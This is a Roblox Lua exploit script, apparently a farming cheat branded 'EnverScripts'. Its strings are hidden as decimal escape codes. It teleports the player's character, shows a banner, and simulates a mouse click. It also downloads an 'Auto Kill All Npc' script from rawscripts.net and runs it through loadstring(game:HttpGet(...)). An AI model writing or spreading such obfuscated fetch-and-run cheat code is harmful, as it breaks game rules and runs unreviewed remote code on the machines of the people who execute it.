pcall(function()
local a=game.Players.LocalPlayer
local b=a.Character or a.CharacterAdded:Wait()
local c=game.PlaceId
if c~=6912372358 then
    b:WaitForChild("HumanoidRootPart").CFrame = CFrame.new(322.8979187011719, 3.6317925453186035, 239.74664306640625)
end
local d=Instance.new("\83\99\114\101\101\110\71\117\105")
local e=Instance.new("\84\101\120\116\76\97\98\101\108")
d.Parent=a:WaitForChild("\80\108\97\121\101\114\71\117\105")
e.Parent=d
e.Size=UDim2.new(0,300,0,50)
e.Position=UDim2.new(0.5,-150,0.1,0)
e.BackgroundColor3=Color3.fromRGB(30,30,30)
e.TextColor3=Color3.fromRGB(255,255,0)
e.Font=Enum.Font.SourceSansBold
e.TextSize=24
e.Text="\69\110\118\101\114\83\99\114\105\112\116\115\32\199\246\108\32\70\97\114\109"
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\115\99\114\105\112\116\115\46\110\101\116\47\114\97\119\47\85\110\105\118\101\114\115\97\108\45\83\99\114\105\112\116\45\65\117\116\111\45\75\105\108\108\45\65\108\108\45\78\112\99\45\54\50\53\57"))()
task.wait(2)
if c~=6912372358 then
    b:WaitForChild("HumanoidRootPart").CFrame = CFrame.new(333.553772, 3.63179207, 238.236481, 0.943683147, -3.38946933e-08, -0.330850571, 8.06098566e-09, 1, -7.94548285e-08, 0.330850571, 7.23132061e-08, 0.943683147)
end
task.wait(1)
local f=game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101")
f.InputBegan:Fire(Enum.UserInputType.MouseButton1)
end)